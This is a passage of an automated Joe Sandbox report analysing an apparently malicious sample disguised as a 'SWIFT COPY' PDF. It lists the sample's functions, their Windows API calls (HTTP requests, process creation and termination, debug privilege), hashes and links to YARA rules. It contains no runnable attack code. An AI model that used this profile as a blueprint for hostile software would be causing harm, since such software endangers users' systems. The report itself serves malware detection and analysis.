                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                    • API String ID: 1924731296-2107944366
                                                                                    • Opcode ID: 8857b45597c46994f1982f35b15066e3cd2af2c965720cc9c944b9651d291d63
                                                                                    • Instruction ID: 7e052098b3a89410953513fd71f0c280da445ab65ceb16891be3489d3f76bf7e
                                                                                    • Opcode Fuzzy Hash: 8857b45597c46994f1982f35b15066e3cd2af2c965720cc9c944b9651d291d63
                                                                                    • Instruction Fuzzy Hash: E4518870218304AFD714EF20DC96FAA77E9BB88714F00491EF9959B2E2DB709944DB92
                                                                                    Function 009745C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009745FF
                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0097462B
                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0097466D
                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00974682
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0097468F
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009746BF
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00974706
                                                                                      • Part of subcall function 00975052: GetLastError.KERNEL32(?,?,009743CC,00000000,00000000,00000001), ref: 00975067
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                    • String ID:
                                                                                    • API String ID: 1241431887-3916222277
                                                                                    • Opcode ID: b13bc85ef23d2f6446ce67d36b5139efe6f86ecdcce23e42183c71011c70a1f0
                                                                                    • Instruction ID: cb6c84e6a2b875fd0ad7c9893a8fedb10605ea96eee8aec91cf43d98ba2e6c57
                                                                                    • Opcode Fuzzy Hash: b13bc85ef23d2f6446ce67d36b5139efe6f86ecdcce23e42183c71011c70a1f0
                                                                                    • Instruction Fuzzy Hash: D7417DB2501219BFEB059F60CC89FBB77ACFF09714F008026FA099A152D7B49E449BA4
                                                                                    Function 0097B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,009BDC00), ref: 0097B715
                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,009BDC00), ref: 0097B749
                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0097B8C1
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0097B8EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                    • String ID:
                                                                                    • API String ID: 560350794-0
                                                                                    • Opcode ID: 5935696bf2d9e9f1693661898f7a5f58a88b6570106e87e6c7474060946b4b85
                                                                                    • Instruction ID: 25baf6df01404a276397bc245b1661a553c45710dd30a8a94e319129d51c477b
                                                                                    • Opcode Fuzzy Hash: 5935696bf2d9e9f1693661898f7a5f58a88b6570106e87e6c7474060946b4b85
                                                                                    • Instruction Fuzzy Hash: 91F10976A00219EFCF04DF94C884EAEB7B9FF89315F108459F919AB250DB35AE45CB90
                                                                                    Function 009824D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 009824F5
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00982688
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009826AC
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009826EC
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0098270E
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0098286F
                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009828A1
                                                                                    • CloseHandle.KERNEL32(?), ref: 009828D0
                                                                                    • CloseHandle.KERNEL32(?), ref: 00982947
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4090791747-0
                                                                                    • Opcode ID: b8351ae64d811bd9017ff988f414b3381ff556a8483634e9d967edc9c38cdfff
                                                                                    • Instruction ID: 7abcb6939238d3ba4225ff37744800d0ce3284c4ca943ee5fa60eb0589c043f2
                                                                                    • Opcode Fuzzy Hash: b8351ae64d811bd9017ff988f414b3381ff556a8483634e9d967edc9c38cdfff
                                                                                    • Instruction Fuzzy Hash: 2CD19D71604201DFCB14EF24D891B6EBBE5AF85314F14896DF89A9B3A2DB31EC41CB52
                                                                                    Function 0098B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0098B3F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: 2e7e1016f20ad2e2fb1434c2bd7a1bf5fd14fa3201e215bac856f63d038629bd
                                                                                    • Instruction ID: 2597fb6286eb4fbff7e2925b2c79e3aa3a9940de956842b8e0f58acb3888b470
                                                                                    • Opcode Fuzzy Hash: 2e7e1016f20ad2e2fb1434c2bd7a1bf5fd14fa3201e215bac856f63d038629bd
                                                                                    • Instruction Fuzzy Hash: 3951B030605204BFEF24BF28CC86BAD3B68AF05714F684416F615E63E2C775E9849B90
                                                                                    Function 0093A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0099DB1B
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0099DB3C
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0099DB51
                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0099DB6E
                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0099DB95
                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0093A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0099DBA0
                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0099DBBD
                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0093A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0099DBC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 1268354404-0
                                                                                    • Opcode ID: bcf617f83b17d59c8be5df3b5b92420cab653df1f9995bd1b97e59e34826094c
                                                                                    • Instruction ID: 0f0aee13dc0909c3bc80c5a88c04d438623df8177cabba90c30d2d900f6b9356
                                                                                    • Opcode Fuzzy Hash: bcf617f83b17d59c8be5df3b5b92420cab653df1f9995bd1b97e59e34826094c
                                                                                    • Instruction Fuzzy Hash: 57516770A15208AFDF24DF68CCC2FAA77B8AF58754F100519F9469A6A0D7B0AD80DF90
                                                                                    Function 00967555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00965FA6,?), ref: 00966ED8
                                                                                      • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00965FA6,?), ref: 00966EF1
                                                                                      • Part of subcall function 009672CB: GetFileAttributesW.KERNEL32(?,00966019), ref: 009672CC
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 009675CA
                                                                                    • _wcscmp.LIBCMT ref: 009675E2
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 009675FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 793581249-0
                                                                                    • Opcode ID: 77f3c97a5243d3945a38138ad94f116258f6d88ceb9a6f022f6f534a78f401a0
                                                                                    • Instruction ID: e813ef5c8448980deb27544343492cf1912c2e300cf0f42e584ed50428a2b6b5
                                                                                    • Opcode Fuzzy Hash: 77f3c97a5243d3945a38138ad94f116258f6d88ceb9a6f022f6f534a78f401a0
                                                                                    • Instruction Fuzzy Hash: FE5120B2A092199ADF50EB94D881EDEB3BC9F48314F1044AAF605E3541EA7497C5CB60
                                                                                    Function 0093EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0099DAD1,00000004,00000000,00000000), ref: 0093EAEB
                                                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0099DAD1,00000004,00000000,00000000), ref: 0093EB32
                                                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0099DAD1,00000004,00000000,00000000), ref: 0099DC86
                                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0099DAD1,00000004,00000000,00000000), ref: 0099DCF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1268545403-0
                                                                                    • Opcode ID: f3f11be37bb19e176588460f8fc3b77631a40afa94b152dc3e6fb75a4650abb9
                                                                                    • Instruction ID: d72a6f57d406f33bf3aeed7c2df6c7ee45e1c4500aa9fdf468ee50a59112b569
                                                                                    • Opcode Fuzzy Hash: f3f11be37bb19e176588460f8fc3b77631a40afa94b152dc3e6fb75a4650abb9
                                                                                    • Instruction Fuzzy Hash: A741DB7021A2809BDF3A4B2A8DCDB66BAADAF52304F19080DF087869E1D7757C40DF51
                                                                                    Function 0095B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0095AEF1,00000B00,?,?), ref: 0095B26C
                                                                                    • HeapAlloc.KERNEL32(00000000,?,0095AEF1,00000B00,?,?), ref: 0095B273
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0095AEF1,00000B00,?,?), ref: 0095B288
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0095AEF1,00000B00,?,?), ref: 0095B290
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0095AEF1,00000B00,?,?), ref: 0095B293
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0095AEF1,00000B00,?,?), ref: 0095B2A3
                                                                                    • GetCurrentProcess.KERNEL32(0095AEF1,00000000,?,0095AEF1,00000B00,?,?), ref: 0095B2AB
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0095AEF1,00000B00,?,?), ref: 0095B2AE
                                                                                    • CreateThread.KERNEL32(00000000,00000000,0095B2D4,00000000,00000000,00000000), ref: 0095B2C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: a757241974cf1dc7160832c75774cc1ef554d00546192fcb42cbc777c4a8c9b8
                                                                                    • Instruction ID: ab87956bd3036499d18dffc232a248e5fb24d81b87a63274602295bea2656625
                                                                                    • Opcode Fuzzy Hash: a757241974cf1dc7160832c75774cc1ef554d00546192fcb42cbc777c4a8c9b8
                                                                                    • Instruction Fuzzy Hash: 4A01FBB5255304BFEB10ABA5DC49F6B3BACEF89705F018411FA06CB5A1CA709800DB61
                                                                                    Function 0097C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    • Opcode ID: 554282083b3217f1889bd3f0ad303fe2427f6bd29e9db1216faa1d80e3964c24
                                                                                    • Instruction ID: c2689d52ec9863a58c7bbeefa7887242d00ed52a51a4ae9dea02e58edb6f1fcf
                                                                                    • Opcode Fuzzy Hash: 554282083b3217f1889bd3f0ad303fe2427f6bd29e9db1216faa1d80e3964c24
                                                                                    • Instruction Fuzzy Hash: 5FE1A4B2A00219ABDF14DFA4D885BEE77B9EF48314F14C52DF909AB281D770AD45CB90
                                                                                    Function 0097BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                    • API String ID: 2862541840-625585964
                                                                                    • Opcode ID: 0bdfc35652d3ddacbcaa86347af4509943379611f223b8c4fa0143b686a5ad66
                                                                                    • Instruction ID: 533bfec58b9e194cf4c24b075207e6910d068d84739d6330605ac7c3e1caca01
                                                                                    • Opcode Fuzzy Hash: 0bdfc35652d3ddacbcaa86347af4509943379611f223b8c4fa0143b686a5ad66
                                                                                    • Instruction Fuzzy Hash: 8C919172A00219AFDF25CF95C844FAEB7B8EF85710F14C55AF519AB280DB749944CFA0
                                                                                    Function 00989A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00989B19
                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00989B2D
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00989B47
                                                                                    • _wcscat.LIBCMT ref: 00989BA2
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00989BB9
                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00989BE7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                    • String ID: SysListView32
                                                                                    • API String ID: 307300125-78025650
                                                                                    • Opcode ID: 5656b7cb3c4f97f07c9b3d9134622185b5bc9d8c7b3ecf0e016ad4f76e924f92
                                                                                    • Instruction ID: c0a0f171b4976835cc0766b55dc63d441c07fe60b6dbd4aacf05e6f7832d0bb4
                                                                                    • Opcode Fuzzy Hash: 5656b7cb3c4f97f07c9b3d9134622185b5bc9d8c7b3ecf0e016ad4f76e924f92
                                                                                    • Instruction Fuzzy Hash: FF41BE70A40308ABDB21AFA4DC85FEE77A8EF48354F14442AF589E7292D7759D84CB60
                                                                                    Function 0098172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00966532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00966554
                                                                                      • Part of subcall function 00966532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00966564
                                                                                      • Part of subcall function 00966532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009665F9
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0098179A
                                                                                    • GetLastError.KERNEL32 ref: 009817AD
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009817D9
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00981855
                                                                                    • GetLastError.KERNEL32(00000000), ref: 00981860
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00981895
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 2533919879-2896544425
                                                                                    • Opcode ID: 8c490732e259b4b3f32162396f50f443cf8d93f0c2432ea87679ff98b1514424
                                                                                    • Instruction ID: 3e21677818c14559acdfbad7f7aa141eeb3b0dd3f612a0697e0ecee74fe8cb4f
                                                                                    • Opcode Fuzzy Hash: 8c490732e259b4b3f32162396f50f443cf8d93f0c2432ea87679ff98b1514424
                                                                                    • Instruction Fuzzy Hash: E641BC71600200AFDB05EF54C8A6FADB7A9AF84310F048499FA069F3D2DB78A945CF91
                                                                                    Function 00965819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 009658B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2457776203-404129466
                                                                                    • Opcode ID: 3f768d2e1c4a418d6124a8e7bbaceee92093aa44414810ed2906018bc356c621
                                                                                    • Instruction ID: 26491e5e98e6ed4406b900291ebbe614b82820fcf505fd0d90141b7d4095e854
                                                                                    • Opcode Fuzzy Hash: 3f768d2e1c4a418d6124a8e7bbaceee92093aa44414810ed2906018bc356c621
                                                                                    • Instruction Fuzzy Hash: 72110A3524DB46BFE7055B549C82EAA279CAFA5324F21403BF601E7A81E7B4AA004665
                                                                                    Function 0096A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0096A806
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
